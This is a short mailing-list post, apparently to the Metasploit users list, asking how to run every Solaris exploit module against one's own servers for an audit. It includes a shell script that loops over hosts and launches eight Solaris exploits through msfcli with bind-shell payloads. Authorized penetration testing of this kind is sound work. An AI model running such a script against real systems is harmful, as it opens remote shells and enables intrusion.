try to exploit everything

[mail2arthur at gmail.com (arthur)]

Hi All,

We are pentesting our Solaris 10 servers and so far I built a script to call msfcli to try all the Solaris modules 
(even Solaris 8/9, partial script below). However the auditor likes to see we try ALL to make sure the server/app won't 
down after a silly hacker try a wrong attack.

With RHOST set globally, is there any easy way to run all.

Thanks,

Arthur

...
APP=./msfcli
ADD="..."
PL1=cmd/unix/bind_perl
PL2=generic/shell_bind_tcp

test_run()
{
  cmd=$@
  echo $cmd

  echo $cmd>>$FN
  sudo $cmd>>$FN 2>&1
}

for addr in $ADD ; do
  test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C
  test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr PAYLOAD=$PL2 E 
  test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2 TARGET=0 E 
  test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E 
done
...
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080725/9e7891ac/attachment.htm>